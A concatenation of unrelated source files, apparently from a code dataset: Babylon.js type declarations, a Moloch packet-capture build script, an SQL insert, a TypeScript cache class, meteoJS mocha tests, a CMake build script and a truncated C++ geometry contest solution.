return Array.prototype.slice.call(arguments).map(add);
};
console.log(map(1, 2, 3));
// Side-effect-only require; example2/example3 presumably registers something -- TODO confirm.
require('example2/example3');
var type = require('example2').type;
console.log(type(console.log)); // Function
|
<filename>node_modules/@babylonjs/gui/2D/multiLinePoint.d.ts
import { Nullable } from "@babylonjs/core/types";
import { Vector3 } from "@babylonjs/core/Maths/math.vector";
import { AbstractMesh } from "@babylonjs/core/Meshes/abstractMesh";
import { MultiLine } from "./controls/multiLine";
import { Control } from "./controls/control";
/**
* Class used to store a point for a MultiLine object.
* The point can be pure 2D coordinates, a mesh or a control
*/
export declare class MultiLinePoint {
    /** Owning MultiLine this point belongs to. */
    private _multiLine;
    /** Raw 2D coordinates (used when neither a control nor a mesh is linked). */
    private _x;
    private _y;
    /** Linked Control, if this point tracks a GUI control. */
    private _control;
    /** Linked mesh, if this point tracks a scene mesh. */
    private _mesh;
    // Observers presumably unregistered by resetLinks()/dispose() -- declaration
    // file only, implementation not visible here.
    private _controlObserver;
    private _meshObserver;
    /** @hidden */
    _point: Vector3;
    /**
     * Creates a new MultiLinePoint
     * @param multiLine defines the source MultiLine object
     */
    constructor(multiLine: MultiLine);
    /** Gets or sets x coordinate */
    get x(): string | number;
    set x(value: string | number);
    /** Gets or sets y coordinate */
    get y(): string | number;
    set y(value: string | number);
    /** Gets or sets the control associated with this point */
    get control(): Nullable<Control>;
    set control(value: Nullable<Control>);
    /** Gets or sets the mesh associated with this point */
    get mesh(): Nullable<AbstractMesh>;
    set mesh(value: Nullable<AbstractMesh>);
    /** Resets links */
    resetLinks(): void;
    /**
     * Gets a translation vector with Z component
     * @returns the translation vector
     */
    translate(): Vector3;
    private _translatePoint;
    /** Release associated resources */
    dispose(): void;
}
|
#!/bin/sh
# Use this script to install OS dependencies, downloading and compile moloch dependencies, compile moloch capture, optionally install
# This script will
# * use apt-get/yum to install OS dependancies
# * download known working versions of moloch dependancies
# * build them statically
# * configure moloch-capture to use them
# * build moloch-capture
# * install node unless --nonode
# * install moloch if --install

# Pinned versions of the statically built thirdparty dependencies.
GLIB=2.54.3
YARA=3.7.1
MAXMIND=1.3.2
PCAP=1.9.0
CURL=7.59.0
LUA=5.3.4
DAQ=2.0.6
NODE=8.11.1

# Defaults, overridable via the command-line flags parsed below.
TDIR="/data/moloch"
DOPFRING=0
DODAQ=0
DOCLEAN=0
DONODE=1
DOINSTALL=0
# Parse command-line options until the first non-option argument.
while :
do
case $1 in
-p | --pf_ring | --pfring)
DOPFRING=1
shift
;;
-d | --dir)
TDIR=$2
shift 2
;;
--daq)
DODAQ=1
shift
;;
--clean)
DOCLEAN=1
shift
;;
--install)
DOINSTALL=1
shift
;;
--nonode)
DONODE=0
shift
;;
--help)
echo "Make it easier to build Moloch! This will download and build thirdparty libraries plus build Moloch."
echo "--dir <directory>  = The directory to install everything into [/data/moloch]"
echo "--clean            = Do a 'make clean' first"
echo "--install          = Do a 'make install' at the end, adding our node to the path"
echo "--nonode           = Do NOT download and install nodejs into the moloch directory"
echo "--pfring           = Build pfring support"
echo "--daq              = Build daq support"
exit 0;
;;
-*)
echo "Unknown option '$1', try '--help'"
exit 1
;;
*)
break
;;
esac
done
# Check the existance of sudo
command -v sudo >/dev/null 2>&1 || { echo >&2 "MOLOCH: sudo is required to be installed"; exit 1; }
MAKE=make
# Installing dependencies
echo "MOLOCH: Installing Dependencies"
# RHEL/CentOS family
if [ -f "/etc/redhat-release" ]; then
sudo yum -y install wget curl pcre pcre-devel pkgconfig flex bison gcc-c++ zlib-devel e2fsprogs-devel openssl-devel file-devel make gettext libuuid-devel perl-JSON bzip2-libs bzip2-devel perl-libwww-perl libpng-devel xz libffi-devel readline-devel libtool libyaml-devel perl-Socket6
if [ $? -ne 0 ]; then
echo "MOLOCH: yum failed"
exit 1
fi
fi
# Debian/Ubuntu family
if [ -f "/etc/debian_version" ]; then
sudo apt-get -y install wget curl libpcre3-dev uuid-dev libmagic-dev pkg-config g++ flex bison zlib1g-dev libffi-dev gettext libgeoip-dev make libjson-perl libbz2-dev libwww-perl libpng-dev xz-utils libffi-dev libssl-dev libreadline-dev libtool libyaml-dev dh-autoreconf libsocket6-perl
if [ $? -ne 0 ]; then
echo "MOLOCH: apt-get failed"
exit 1
fi
fi
# FreeBSD: use pkg_add and GNU make for the builds below.
# NOTE(review): pkg_add is long deprecated in favor of pkg -- verify on a current FreeBSD.
if [ "$(uname)" = "FreeBSD" ]; then
sudo pkg_add -Fr wget curl pcre flex bison gettext e2fsprogs-libuuid glib gmake libexecinfo
MAKE=gmake
fi
echo "MOLOCH: Downloading and building static thirdparty libraries"
if [ ! -d "thirdparty" ]; then
mkdir thirdparty
fi
cd thirdparty || exit
TPWD=`pwd`
# glib: built statically, except on FreeBSD where the system glib is used.
if [ "$(uname)" = "FreeBSD" ]; then
#Screw it, use whatever the OS has
WITHGLIB=" "
else
WITHGLIB="--with-glib2=thirdparty/glib-$GLIB"
if [ ! -f "glib-$GLIB.tar.xz" ]; then
# Upstream organizes tarballs under the major.minor directory.
GLIBDIR=$(echo $GLIB | cut -d. -f 1-2)
wget "http://ftp.gnome.org/pub/gnome/sources/glib/$GLIBDIR/glib-$GLIB.tar.xz"
fi
# Rebuild only when the static archives are missing.
if [ ! -f "glib-$GLIB/gio/.libs/libgio-2.0.a" ] || [ ! -f "glib-$GLIB/glib/.libs/libglib-2.0.a" ]; then
xzcat glib-$GLIB.tar.xz | tar xf -
(cd glib-$GLIB ; ./configure --disable-xattr --disable-shared --enable-static --disable-libelf --disable-selinux --disable-libmount --with-pcre=internal; $MAKE)
if [ $? -ne 0 ]; then
echo "MOLOCH: $MAKE failed"
exit 1
fi
else
echo "MOLOCH: Not rebuilding glib"
fi
fi
# yara: static build for rule-based payload matching.
if [ ! -f "yara/yara-$YARA.tar.gz" ]; then
mkdir -p yara
wget https://github.com/VirusTotal/yara/archive/v$YARA.tar.gz -O yara/yara-$YARA.tar.gz
fi
# Rebuild only when the static archive is missing.
if [ ! -f "yara/yara-$YARA/libyara/.libs/libyara.a" ]; then
(cd yara ; tar zxf yara-$YARA.tar.gz)
(cd yara/yara-$YARA; ./bootstrap.sh ; ./configure --enable-static; $MAKE)
if [ $? -ne 0 ]; then
echo "MOLOCH: $MAKE failed"
exit 1
fi
else
echo "MOLOCH: Not rebuilding yara"
fi
# Maxmind: static libmaxminddb for GeoIP lookups.
if [ ! -f "libmaxminddb-$MAXMIND.tar.gz" ]; then
wget https://github.com/maxmind/libmaxminddb/releases/download/$MAXMIND/libmaxminddb-$MAXMIND.tar.gz
fi
if [ ! -f "libmaxminddb-$MAXMIND/src/.libs/libmaxminddb.a" ]; then
tar zxf libmaxminddb-$MAXMIND.tar.gz
(cd libmaxminddb-$MAXMIND ; ./configure --enable-static; $MAKE)
if [ $? -ne 0 ]; then
echo "MOLOCH: $MAKE failed"
exit 1
fi
else
echo "MOLOCH: Not rebuilding libmaxmind"
fi
# libpcap: local build with optional capture backends disabled.
if [ ! -f "libpcap-$PCAP.tar.gz" ]; then
wget http://www.tcpdump.org/release/libpcap-$PCAP.tar.gz
fi
if [ ! -f "libpcap-$PCAP/libpcap.a" ]; then
tar zxf libpcap-$PCAP.tar.gz
echo "MOLOCH: Building libpcap";
(cd libpcap-$PCAP; ./configure --disable-dbus --disable-usb --disable-canusb --disable-bluetooth --with-snf=no; $MAKE)
if [ $? -ne 0 ]; then
echo "MOLOCH: $MAKE failed"
exit 1
fi
else
echo "MOLOCH: NOT rebuilding libpcap";
fi
# Point the top-level configure at the locally built libpcap.
PCAPDIR=$TPWD/libpcap-$PCAP
PCAPBUILD="--with-libpcap=$PCAPDIR"
# curl: static build with unused protocol/feature support disabled.
if [ ! -f "curl-$CURL.tar.gz" ]; then
wget http://curl.haxx.se/download/curl-$CURL.tar.gz
fi
if [ ! -f "curl-$CURL/lib/.libs/libcurl.a" ]; then
tar zxf curl-$CURL.tar.gz
( cd curl-$CURL; ./configure --disable-ldap --disable-ldaps --without-libidn2 --without-librtmp --without-libpsl --without-nghttp2 --without-nghttp2 --without-nss; $MAKE)
if [ $? -ne 0 ]; then
echo "MOLOCH: $MAKE failed"
exit 1
fi
else
echo "MOLOCH: Not rebuilding curl"
fi
# lua: static liblua for the moloch lua plugin.
if [ ! -f "lua-$LUA.tar.gz" ]; then
    wget https://www.lua.org/ftp/lua-$LUA.tar.gz
fi
if [ ! -f "lua-$LUA/src/liblua.a" ]; then
    tar zxf lua-$LUA.tar.gz
    # Use $MAKE for consistency with the other stanzas (gmake on FreeBSD; the
    # error message below already referenced $MAKE while the build used `make`).
    # -fPIC so the static archive can be linked into the shared plugin.
    # NOTE(review): the `linux` platform target is hardcoded -- non-Linux hosts
    # would need a different lua target.
    ( cd lua-$LUA; $MAKE MYCFLAGS=-fPIC linux)
    if [ $? -ne 0 ]; then
        echo "MOLOCH: $MAKE failed"
        exit 1
    fi
else
    echo "MOLOCH: Not rebuilding lua"
fi
# daq: optional Snort DAQ support, built only with --daq.
if [ $DODAQ -eq 1 ]; then
    if [ ! -f "daq-$DAQ.tar.gz" ]; then
        wget https://www.snort.org/downloads/snort/daq-$DAQ.tar.gz
    fi
    if [ ! -f "daq-$DAQ/api/.libs/libdaq_static.a" ]; then
        tar zxf daq-$DAQ.tar.gz
        # Build against the locally built libpcap; use $MAKE so the FreeBSD
        # (gmake) path works, matching the error message below.
        ( cd daq-$DAQ; ./configure --with-libpcap-includes=$TPWD/libpcap-$PCAP/ --with-libpcap-libraries=$TPWD/libpcap-$PCAP; $MAKE; sudo $MAKE install)
        if [ $? -ne 0 ]; then
            echo "MOLOCH: $MAKE failed"
            exit 1
        fi
    else
        echo "MOLOCH: Not rebuilding daq"
    fi
fi
# Now build moloch
echo "MOLOCH: Building capture"
cd ..
# Echo the configure invocation for the build log, then run it.
echo "./configure --prefix=$TDIR $PCAPBUILD --with-yara=thirdparty/yara/yara-$YARA --with-maxminddb=thirdparty/libmaxminddb-$MAXMIND $WITHGLIB --with-curl=thirdparty/curl-$CURL --with-lua=thirdparty/lua-$LUA"
./configure --prefix=$TDIR $PCAPBUILD --with-yara=thirdparty/yara/yara-$YARA --with-maxminddb=thirdparty/libmaxminddb-$MAXMIND $WITHGLIB --with-curl=thirdparty/curl-$CURL --with-lua=thirdparty/lua-$LUA
if [ $DOCLEAN -eq 1 ]; then
$MAKE clean
fi
$MAKE
if [ $? -ne 0 ]; then
echo "MOLOCH: $MAKE failed"
exit 1
fi
# Build plugins: lua always; pfring/daq/snf only when requested or their libs are present.
(cd capture/plugins/lua; $MAKE)
if [ $DOPFRING -eq 1 ] || [ -f "/usr/local/lib/libpfring.so" ]; then
(cd capture/plugins/pfring; $MAKE)
fi
if [ $DODAQ -eq 1 ]; then
(cd capture/plugins/daq; $MAKE)
fi
if [ -f "/opt/snf/lib/libsnf.so" ]; then
(cd capture/plugins/snf; $MAKE)
fi
# Install a private nodejs under $TDIR unless --nonode was given or it already exists.
if [ $DONODE -eq 1 ] && [ ! -f "$TDIR/bin/node" ]; then
echo "MOLOCH: Installing node $NODE"
sudo mkdir -p $TDIR/bin $TDIR/etc
if [ ! -f node-v$NODE-linux-x64.tar.xz ] ; then
wget https://nodejs.org/download/release/v$NODE/node-v$NODE-linux-x64.tar.xz
fi
sudo tar xfC node-v$NODE-linux-x64.tar.xz $TDIR
(cd $TDIR/bin ; sudo ln -s ../node-v$NODE-linux-x64/bin/* .)
fi
if [ $DOINSTALL -eq 1 ]; then
export PATH=$TDIR/bin:$PATH
sudo make install
echo "MOLOCH: Installed, now type sudo make config'"
else
echo "MOLOCH: Now type 'sudo make install' and 'sudo make config'"
fi
exit 0
|
<filename>sql/user_progress_insert.sql
-- Inserts one user_progress row: id drawn from sequence 'somsequence',
-- user_string bound to parameter $1, display initialised to 0 and
-- last_modif stamped with the current date.
insert into user_progress (id, user_string, display, last_modif) values (nextval('somsequence'), $1, 0, CURRENT_DATE);
<reponame>ErickSharp/installer<gh_stars>0
/**
 * Small localStorage-backed TTL cache.
 *
 * Values are stored under `data_cache_<key>` as JSON, with the write time
 * under `data_cache_<key>_timestamp`; `limit` is the maximum age in
 * milliseconds before a cached value counts as stale.
 */
export class DataCache<T> {
    key: string;
    limit: number;

    constructor(key: string, limit: number) {
        this.key = key;
        this.limit = limit;
    }

    /** Convenience factory, equivalent to `new DataCache<T>(key, limit)`. */
    static from<T>(key: string, limit: number): DataCache<T> {
        return new DataCache(key, limit);
    }

    /**
     * Returns the cached value when present and fresh; otherwise awaits
     * `fetcher()`, stores its result (plus a timestamp) and returns it.
     */
    async fetchOrCompute(fetcher: () => Promise<T>): Promise<T> {
        // A corrupted cache entry used to make JSON.parse throw out of this
        // method; treat unparseable data as a plain cache miss instead.
        let cachedData: T | null = null;
        try {
            cachedData = JSON.parse(localStorage.getItem(`data_cache_${this.key}`));
        } catch (e) {
            cachedData = null;
        }
        // getItem() returning null yields Number(null) === 0 here, so a
        // missing timestamp fails the freshness check and triggers a fetch.
        const cachedDataTimestamp = Number(localStorage.getItem(`data_cache_${this.key}_timestamp`));

        if (cachedData && Date.now() - cachedDataTimestamp < this.limit) {
            return cachedData as T;
        }

        const data = await fetcher();
        localStorage.setItem(`data_cache_${this.key}`, JSON.stringify(data));
        localStorage.setItem(`data_cache_${this.key}_timestamp`, String(Date.now()));
        return data;
    }
}
|
<reponame>chird/meteoJS
import assert from 'assert';
import 'jsdom-global/register';
import Type from '../../../src/meteoJS/synview/Type.js';
import TypeCollection from '../../../src/meteoJS/synview/TypeCollection.js';
it('exclusiveVisibility (standard)', () => {
  // With exclusiveVisibility on, at most one type may be visible at a time.
  const coll = new TypeCollection({ exclusiveVisibility: true });
  for (const id of [0, 1, 2])
    coll.append(new Type({ id, visible: false }));
  const visibleIds = () =>
    coll.getVisibleTypes().map(t => t.getId()).join(',');
  assert.equal(coll.getVisibleTypes().length, 0, 'No visible types');
  assert.equal(coll.isVisible(), false, 'collection not visible');
  coll.getItemById(0).setVisible(true);
  assert.equal(visibleIds(), '0', 'Visible ID');
  assert.equal(coll.isVisible(), true, 'collection not visible');
  // Showing another type must replace the currently visible one.
  coll.getItemById(1).setVisible(true);
  assert.equal(visibleIds(), '1', 'Visible ID');
  assert.equal(coll.isVisible(), true, 'collection not visible');
  coll.getItemById(0).setVisible(false);
  assert.equal(visibleIds(), '1', 'Visible ID');
  assert.equal(coll.isVisible(), true, 'collection visible');
  // Appending a visible type must not displace the current one.
  coll.append(new Type({ id: 4, visible: true }));
  assert.equal(visibleIds(), '1', 'Visible ID');
  assert.equal(coll.isVisible(), true, 'collection visible');
  coll.getItemById(1).setVisible(false);
  assert.equal(coll.getVisibleTypes().length, 0, 'No visible types');
  assert.equal(coll.isVisible(), false, 'collection not visible');
});
it('exclusiveVisibility (option change)', () => {
  // Builds a three-type collection (ids 0..2) whose initial visibility is
  // decided per id by the supplied predicate.
  const makeCollection = visibleFor => {
    const coll = new TypeCollection();
    for (const id of [0, 1, 2])
      coll.append(new Type({ id, visible: visibleFor(id) }));
    return coll;
  };
  // All visible: enabling the option keeps exactly the first one visible.
  const c1 = makeCollection(() => true);
  assert.equal(c1.getVisibleTypes().length, 3, '3 visible types');
  assert.equal(c1.isVisible(), true, 'collection visible');
  c1.setExclusiveVisibility(true);
  assert.equal(c1.getVisibleTypes().length, 1, '1 visible types');
  assert.equal(c1.getVisibleTypes()[0].getId(), 0, 'Visible type ID = 0');
  assert.equal(c1.isVisible(), true, 'collection visible');
  // Exactly one visible: enabling the option changes nothing.
  const c2 = makeCollection(id => id >= 2);
  assert.equal(c2.getVisibleTypes().length, 1, '1 visible types');
  assert.equal(c2.getVisibleTypes()[0].getId(), 2, 'Visible type ID = 2');
  assert.equal(c2.isVisible(), true, 'collection visible');
  c2.setExclusiveVisibility(true);
  assert.equal(c2.getVisibleTypes().length, 1, '1 visible types');
  assert.equal(c2.getVisibleTypes()[0].getId(), 2, 'Visible type ID = 2');
  assert.equal(c2.isVisible(), true, 'collection visible');
  c2.getItemById(1).setVisible(true);
  assert.equal(c2.getVisibleTypes().length, 1, '1 visible types');
  assert.equal(c2.getVisibleTypes()[0].getId(), 1, 'Visible type ID = 1');
  assert.equal(c2.isVisible(), true, 'collection visible');
  // Two visible: enabling the option keeps only the first visible one.
  const c3 = makeCollection(id => id >= 1);
  assert.equal(c3.getVisibleTypes().length, 2, '2 visible types');
  assert.equal(c3.isVisible(), true, 'collection visible');
  c3.setExclusiveVisibility(true);
  assert.equal(c3.getVisibleTypes().length, 1, '1 visible types');
  assert.equal(c3.getVisibleTypes()[0].getId(), 1, 'Visible type ID = 1');
  assert.equal(c3.isVisible(), true, 'collection visible');
});
it('syncVisibility (standard)', () => {
  // With syncVisibility on, every type in the collection shares one
  // visibility state.
  const coll = new TypeCollection({ syncVisibility: true });
  for (const id of [0, 1, 2])
    coll.append(new Type({ id, visible: false }));
  assert.equal(coll.getVisibleTypes().length, 0, 'No visible types');
  assert.equal(coll.isVisible(), false, 'collection not visible');
  // Appending a visible type switches the whole collection visible.
  coll.append(new Type({ id: 4, visible: true }));
  assert.equal(coll.getVisibleTypes().length, 4, '4 visible types');
  assert.equal(coll.isVisible(), true, 'collection visible');
  // An appended hidden type is pulled into the shared (visible) state.
  coll.append(new Type({ id: 5, visible: false }));
  assert.equal(coll.getVisibleTypes().length, 5, '5 visible types');
  assert.equal(coll.isVisible(), true, 'collection visible');
  // Hiding any single type hides everything.
  coll.getItemById(4).setVisible(false);
  assert.equal(coll.getVisibleTypes().length, 0, 'No visible types');
  assert.equal(coll.isVisible(), false, 'collection not visible');
});
it('syncVisibility (option change)', () => {
  // Builds a three-type collection (ids 0..2) whose initial visibility is
  // decided per id by the supplied predicate.
  const makeCollection = visibleFor => {
    const coll = new TypeCollection({});
    for (const id of [0, 1, 2])
      coll.append(new Type({ id, visible: visibleFor(id) }));
    return coll;
  };
  // All hidden: enabling sync changes nothing until one type is toggled,
  // after which the whole collection follows.
  const c1 = makeCollection(() => false);
  assert.equal(c1.getVisibleTypes().length, 0, 'No visible types');
  assert.equal(c1.isVisible(), false, 'collection not visible');
  c1.setSyncVisibility(true);
  assert.equal(c1.getVisibleTypes().length, 0, 'No visible types');
  assert.equal(c1.isVisible(), false, 'collection not visible');
  c1.getItemById(0).setVisible(true);
  assert.equal(c1.getVisibleTypes().length, 3, '3 visible types');
  assert.equal(c1.isVisible(), true, 'collection visible');
  // All visible: stays in sync; hiding one hides everything.
  const c2 = makeCollection(() => true);
  assert.equal(c2.getVisibleTypes().length, 3, '3 visible types');
  assert.equal(c2.isVisible(), true, 'collection visible');
  c2.setSyncVisibility(true);
  assert.equal(c2.getVisibleTypes().length, 3, '3 visible types');
  assert.equal(c2.isVisible(), true, 'collection visible');
  c2.getItemById(0).setVisible(false);
  assert.equal(c2.getVisibleTypes().length, 0, 'No visible types');
  assert.equal(c2.isVisible(), false, 'collection not visible');
  // Mixed visibility: enabling sync turns everything visible.
  const c3 = makeCollection(id => id >= 2);
  assert.equal(c3.getVisibleTypes().length, 1, '1 visible types');
  assert.equal(c3.isVisible(), true, 'collection visible');
  c3.setSyncVisibility(true);
  assert.equal(c3.getVisibleTypes().length, 3, '3 visible types');
  assert.equal(c3.isVisible(), true, 'collection visible');
  const c4 = makeCollection(id => id >= 1);
  assert.equal(c4.getVisibleTypes().length, 2, '2 visible types');
  assert.equal(c4.isVisible(), true, 'collection visible');
  c4.setSyncVisibility(true);
  assert.equal(c4.getVisibleTypes().length, 3, '3 visible types');
  assert.equal(c4.isVisible(), true, 'collection visible');
});
#!/bin/bash
# Copyright 2017 ARC Centre of Excellence for Climate Systems Science
#
# \author Scott Wales <scott.wales@unimelb.edu.au>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
set -eu

# Absolute directory containing this script, so src/ resolves regardless of
# the caller's working directory.
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"

mkdir -p build install
# NOTE(review): pushd without a matching popd — harmless here since the
# script runs to completion inside build/, but confirm it is intentional.
pushd build

# Out-of-source configure with the MPI compiler wrappers; dependency
# locations come from *_ROOT / $PREFIX environment variables expected to be
# set by the caller.
CC=mpicc FC=mpif90 cmake ${DIR}/src \
    -DMPI_Fortran_LIBRARIES=$OPENMPI_ROOT/lib/Intel/libmpi_f90.so \
    -DMPI_Fortran_INCLUDE_PATH=$OPENMPI_ROOT/include/Intel \
    -DPnetCDF_PATH=$PNETCDF_ROOT \
    -DNetCDF_PATH=$NETCDF_ROOT \
    -DNetCDF_Fortran_PATH=$NETCDF_FORTRAN_ROOT \
    -DCMAKE_INSTALL_PREFIX=$PREFIX \
    -DCMAKE_C_FLAGS="-std=gnu99"

# Build with full command echo, run the test target, then install to $PREFIX.
make VERBOSE=yes
make check
make install
|
<gh_stars>0
// By KRT girl xiplus
#include <bits/stdc++.h>
#define endl '\n'
#define Debug(A)
const double PI=acos(-1);
const double eps=10e-6;
using namespace std;
// 2-D point (also used as a free vector) in double precision.
struct Point{
    double x,y;
};

// Fuzzy equality: points coincide when both coordinate differences are
// below the global eps tolerance.
bool operator == (Point a,Point b){
    return abs(a.x-b.x)<eps&&abs(a.y-b.y)<eps;
}

// Exact logical negation (De Morgan) of the fuzzy equality above.
bool operator != (Point a,Point b){
    return abs(a.x-b.x)>=eps||abs(a.y-b.y)>=eps;
}
// Polar angle of p around the origin, in degrees in [0, 360).
// Rewritten on atan2: the previous piecewise atan(p.y/p.x) form divided by
// p.x and relied on IEEE Inf propagation for points on the y axis; atan2
// handles all four quadrants and the p.x == 0 axis directly and returns the
// same angle for every nonzero point. (For p == (0,0) this now returns 0
// instead of NaN.)
double get_angle(Point p){
    double deg = atan2(p.y, p.x) / PI * 180;   // atan2 range (-180, 180]
    if (deg < 0) deg += 360;                   // shift into [0, 360)
    return deg;
}
// One candidate vertex of the visible region, tagged for the angular sweep.
struct PointList{
    Point point;
    double angle;  // polar angle around the observer, degrees [0,360)
    // 0 / 1: the two angular ends of an occluding outline, 2: a corner
    // point — inferred from the pushes in main(); confirm.
    int type;
};

// Sweep order: ascending polar angle; on (eps-)equal angles the higher type
// sorts first, so corner points precede outline ends at the same angle.
bool cmp_point(PointList a,PointList b){
    if(abs(a.angle-b.angle)<eps) return a.type>b.type;
    return a.angle<b.angle;
}

// Line segment between two points.
struct Side{
    Point p1,p2;
};

// Solution pair (x, y) of a 2x2 linear system; {NAN,NAN} marks "no unique
// solution" (see Cramer below).
struct Multiple{
    double x,y;
};

// Vector from a to b.
Point get_vector(Point a,Point b){
    return {b.x-a.x,b.y-a.y};
}
// Cramer's rule for the 2x2 linear system
//   ax + by = e
//   cx + dy = f
// Returns the solution (x, y), or {NAN,NAN} when the determinant a*d - b*c
// vanishes (parallel / degenerate system).
// NOTE(review): the determinant test uses exact floating-point equality, not
// the file-wide eps tolerance — near-parallel inputs still yield a (huge)
// finite result; confirm this is intended.
Multiple Cramer(double a,double b,double c,double d,double e,double f){
    // ax+by=e
    // cx+dy=f
    // https://zh.wikipedia.org/wiki/%E5%85%8B%E8%90%8A%E5%A7%86%E6%B3%95%E5%89%87#.E4.BE.8B.E5.AD.90
    if(a*d==b*c)return {NAN,NAN};
    return {(e*d-b*f)/(a*d-b*c),(a*f-e*c)/(a*d-b*c)};
}
// Intersection point of segment a1-a2 with segment b1-b2.
// Both segments are written in parametric form and the two parameters are
// solved with Cramer(); the hit is accepted only when it lies inside BOTH
// segments' eps-padded bounding boxes. Returns {NAN,NAN} for parallel lines
// or an out-of-range hit.
Point Intersection(Point a1,Point a2,Point b1,Point b2){
    // v1=a2-a1 v2=b2-b1
    Point Va=get_vector(a1,a2),Vb=get_vector(b1,b2);
    Point A=a1,B=b1;
    // Ax+m*Vax=Bx+n*Vbx
    // Ay+m*Vay=By+n*Vby
    // rearranged into the 2x2 system:
    // Vax*m+(-Vbx)*n=Bx-Ax
    // Vay*m+(-Vby)*n=By-Ay
    Multiple k=Cramer(Va.x,-Vb.x,Va.y,-Vb.y,B.x-A.x,B.y-A.y);
    if(std::isnan(k.x))return {NAN,NAN};
    // k.x is the parameter along a1-a2; substitute back to get the point.
    Point ans={A.x+k.x*Va.x,A.y+k.x*Va.y};
    if(min(a1.x,a2.x)-eps<=ans.x&&ans.x<=max(a1.x,a2.x)+eps&&
    min(a1.y,a2.y)-eps<=ans.y&&ans.y<=max(a1.y,a2.y)+eps&&
    min(b1.x,b2.x)-eps<=ans.x&&ans.x<=max(b1.x,b2.x)+eps&&
    min(b1.y,b2.y)-eps<=ans.y&&ans.y<=max(b1.y,b2.y)+eps
    )return ans;
    return {NAN,NAN};
}
// Classify rectangle [xl,xr] x [yb,yt] (observer-relative coordinates)
// against the square [-R,R]^2.
// Returns 0 when the rectangle lies entirely outside the square; otherwise
// a region index 1..9 laid out row-major, top row first:
//   1 2 3   (top row: rectangle entirely above the x axis)
//   4 5 6
//   7 8 9   (bottom row: entirely below)
// where the column encodes the rectangle's position relative to the y axis.
int get_side(double xl,double yt,double xr,double yb,double R){
    // Entirely off one side of the square -> irrelevant to visibility.
    if (xr <= -R || xl >= +R || yb >= +R || yt <= -R) return 0;
    // Column 0..2: right edge reaching x>=0 shifts right once; left edge
    // strictly right of the axis shifts once more.
    int col = (xr >= 0 ? 1 : 0) + (xl > 0 ? 1 : 0);
    // Row 0..2: same scheme on y (bottom edge at/below axis, top edge below).
    int row = (yb <= 0 ? 1 : 0) + (yt < 0 ? 1 : 0);
    return 1 + col + 3 * row;
}
// Per test case: a square "room" of half-side R centred on the observer at
// (px, py), plus N axis-aligned rectangular obstacles. Coordinates are first
// translated so the observer sits at the origin; the visible region is then
// assembled as a star-shaped polygon from critical points (square corners,
// obstacle silhouette corners and their projected shadow points) ordered by
// polar angle, and its area taken with the shoelace formula. The printed
// answer is the NON-visible area: total square area minus visible polygon
// area minus obstacle area inside the square.
int main(){
    // ios::sync_with_stdio(false);
    // cin.tie(0);
    int T,N;
    double R,px,py;
    cin>>T;
    Debug(FILE *ggb;
    ggb=fopen("zj b807-ggb.txt","w");
    fprintf(ggb,"var a = ggbApplet; \n");)
    Debug(int testcount=0;)
    while(T--){
        Debug(testcount++;)
        Debug(cout<<"#"<<testcount<<endl;)
        cin>>R>>px>>py>>N;
        Debug(printf("%lf %lf %lf %d \n",R,px,py,N);)
        Debug(fprintf(ggb,"a.evalCommand('Polygon[(%lf,%lf), (%lf,%lf), (%lf,%lf), (%lf,%lf)]'); \n",px-R,py+R,px-R,py-R,px+R,py-R,px+R,py+R);)
        // Seed the sweep with the four square corners (type 2) and the four
        // square edges, each extended by 1 so boundary hits always register.
        vector<PointList>pointlist;
        pointlist.push_back({-R,+R,0,2});
        pointlist.push_back({+R,+R,0,2});
        pointlist.push_back({-R,-R,0,2});
        pointlist.push_back({+R,-R,0,2});
        vector<Side>sidelist;
        sidelist.push_back({{-R-1,+R},{+R+1,+R}});
        sidelist.push_back({{-R-1,-R},{+R+1,-R}});
        sidelist.push_back({{-R,+R+1},{-R,-R-1}});
        sidelist.push_back({{+R,+R+1},{+R,-R-1}});
        double obstacle_ans=0;
        for(int q=0;q<N;q++){
            double xl,yt,xr,yb;
            cin>>xl>>yt>>xr>>yb;
            Debug(printf("%lf %lf %lf %lf \n",xl,yt,xr,yb);)
            // Translate to observer-centred coordinates and normalise the
            // corner order so that xl<=xr and yb<=yt.
            xl-=px;xr-=px;
            yt-=py;yb-=py;
            if(xl>xr) swap(xl,xr);
            if(yt<yb) swap(yt,yb);
            Debug(fprintf(ggb,"a.evalCommand('Polygon[(%lf,%lf), (%lf,%lf), (%lf,%lf), (%lf,%lf)]'); \n",xl,yt,xl,yb,xr,yb,xr,yt);)
            int side=get_side(xl,yt,xr,yb,R);
            if(side==0)continue;           // entirely outside the square
            if(xl==xr&&yt==yb)continue;    // degenerate zero-size obstacle
            // Obstacle area clipped to the square.
            obstacle_ans+=(min(xr,R)-max(xl,-R))*(min(yt,R)-max(yb,-R));
            // Record the obstacle edges facing the observer; which edges
            // occlude depends on the 3x3 region index from get_side():
            // column via side%3, row via side<=3 / side>=7.
            if(yt!=yb){
                if(side%3==1) sidelist.push_back({{xr,yt},{xr,yb}});
                else if(side%3==0) sidelist.push_back({{xl,yt},{xl,yb}});
            }
            if(xl!=xr){
                if(side<=3) sidelist.push_back({{xl,yb},{xr,yb}});
                else if(side>=7) sidelist.push_back({{xl,yt},{xr,yt}});
            }
            Debug(printf("inputside: %lf %lf %lf %lf %d \n",xl,yt,xr,yb,side);)
            // Push the obstacle's silhouette points per region: types 0/1
            // are the two angular ends of the occluding outline, type 2 an
            // inner silhouette corner. Coordinates are clamped to the square
            // where the obstacle sticks out. NOTE(review): no case 5 —
            // region 5 would place the observer inside the obstacle.
            switch(side){
                case 1:
                    pointlist.push_back({xr,min(yt,R),0,0});
                    Debug(fprintf(ggb,"a.evalCommand('Ray[(0,0), (%lf,%lf)]'); \n",xr,min(yt,R));)
                    pointlist.push_back({max(xl,-R),yb,0,1});
                    Debug(fprintf(ggb,"a.evalCommand('Ray[(0,0), (%lf,%lf)]'); \n",max(xl,-R),yb);)
                    if(xl!=xr&&yt!=yb)pointlist.push_back({xr,yb,0,2});
                    break;
                case 2:
                    pointlist.push_back({xr,yb,0,0});
                    Debug(fprintf(ggb,"a.evalCommand('Ray[(0,0), (%lf,%lf)]'); \n",xr,yb);)
                    pointlist.push_back({xl,yb,0,1});
